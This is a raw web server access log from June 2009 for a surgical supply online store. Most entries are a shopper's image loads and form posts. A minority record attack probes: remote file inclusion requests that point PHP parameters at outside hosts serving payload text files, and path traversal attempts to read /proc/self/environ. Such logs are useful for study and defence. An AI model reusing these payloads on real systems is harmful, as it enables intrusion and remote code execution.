66.74.141.181 - - [06/Jun/2009:02:36:35 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A39452F229200FA2E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:36:35 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A39452F229200FA2E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:36:35 -0400] "GET /images/fav_a-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A39452F229200FA2E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:36:35 -0400] "GET /images/addtocart.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A39452F229200FA2E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:36:35 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A39452F229200FA2E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:36:36 -0400] "GET /images/next.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A39452F229200FA2E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:36:36 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A39452F229200FA2E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:36:36 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A39452F229200FA2E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:36:36 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A39452F229200FA2E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:36:36 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A39452F229200FA2E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:36:36 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A39452F229200FA2E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:36:36 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A39452F229200FA2E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:36:37 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A39452F229200FA2E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:36:37 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A39452F229200FA2E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:36:37 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A39452F229200FA2E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:36:37 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A39452F229200FA2E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
209.59.12.99 - - [06/Jun/2009:02:40:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.30.80 - - [06/Jun/2009:02:41:24 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:02:41:24 -0400] "GET /logs/access_log.Q109052100%20%20//bemarket/postscript/postscript.php?p_mode=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
217.147.30.80 - - [06/Jun/2009:02:41:24 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.246.20.221 - - [06/Jun/2009:02:41:28 -0400] "GET /logs/access_log.Q109051600////?_SERVER[DOCUMENT_ROOT]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
212.203.95.235 - - [06/Jun/2009:02:42:01 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
66.74.141.181 - - [06/Jun/2009:02:42:21 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L100A3A4623B22200532E06B+M37+ENG HTTP/1.1" 200 38424 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A39452F229200FA2E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
90.185.249.111 - - [06/Jun/2009:02:42:46 -0400] "GET /?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
90.185.249.111 - - [06/Jun/2009:02:42:46 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
90.185.249.111 - - [06/Jun/2009:02:42:46 -0400] "GET /logs/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 200 4366 "-" "Mozilla/5.0"
90.185.249.111 - - [06/Jun/2009:02:43:01 -0400] "GET /logs/access_log.Q109052100%20%20/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.74.141.181 - - [06/Jun/2009:02:43:16 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L100A3B4321A28200A14E06B+M37+ENG HTTP/1.1" 200 38426 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3A4623B22200532E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
218.1.64.133 - - [06/Jun/2009:02:43:16 -0400] "GET /logs/access_log.Q109052900//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
218.1.64.133 - - [06/Jun/2009:02:43:16 -0400] "GET /logs/access_log.Q109052900/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
218.1.64.133 - - [06/Jun/2009:02:43:17 -0400] "GET /logs/access_log.Q109052900//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 259 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:02:43:18 -0400] "GET /logs/access_log.Q109052900//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 259 "-" "XXXXXX"
66.74.141.181 - - [06/Jun/2009:02:43:19 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L100A3B4621C2B200D12E06B+M37+ENG HTTP/1.1" 200 76667 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B4321A28200A14E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:43:20 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B4621C2B200D12E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:43:20 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B4621C2B200D12E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:43:21 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B4621C2B200D12E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
218.246.20.221 - - [06/Jun/2009:02:43:26 -0400] "GET /logs/access_log.Q109050300////?_SERVER[DOCUMENT_ROOT]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.74.141.181 - - [06/Jun/2009:02:43:36 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L100A3B4921123200DBBE06B+M37+ENG HTTP/1.1" 200 38449 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B4621C2B200D12E06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:44:06 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B4921123200DBBE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:44:06 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:44:06 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:44:08 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:44:08 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:02 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG HTTP/1.1" 200 46921 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B4921123200DBBE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:03 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:03 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:03 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:03 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:04 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:04 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:04 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:04 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:04 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:04 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:04 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:04 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:04 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:04 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:05 -0400] "GET /images/fav_a-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:05 -0400] "GET /images/addtocart.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:05 -0400] "GET /images/items/04948201_THUMB.JPG HTTP/1.1" 200 1901 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:05 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:05 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:05 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:05 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:05 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:06 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:06 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:06 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:06 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:06 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:45:06 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
209.59.12.99 - - [06/Jun/2009:02:45:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.74.141.181 - - [06/Jun/2009:02:46:13 -0400] "GET /images/fav_a-b.gif HTTP/1.1" 200 275 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:46:21 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L100A3C4B2F72A20038BE06B+M37+ENG HTTP/1.1" 200 47559 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3B492E722200E3EE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:46:36 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L100A3C472282D2008EAE06B+M37+ENG HTTP/1.1" 200 47557 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3C4B2F72A20038BE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:46:37 -0400] "GET /images/items/04948202_THUMB.JPG HTTP/1.1" 200 2008 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3C472282D2008EAE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
66.74.141.181 - - [06/Jun/2009:02:46:44 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L100A3C462172F200971E06B+M37+ENG HTTP/1.1" 200 47561 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L100A3C472282D2008EAE06B+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
217.147.30.80 - - [06/Jun/2009:02:47:47 -0400] "GET /logs/access_log.Q109052100//bemarket/postscript/postscript.php?p_mode=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
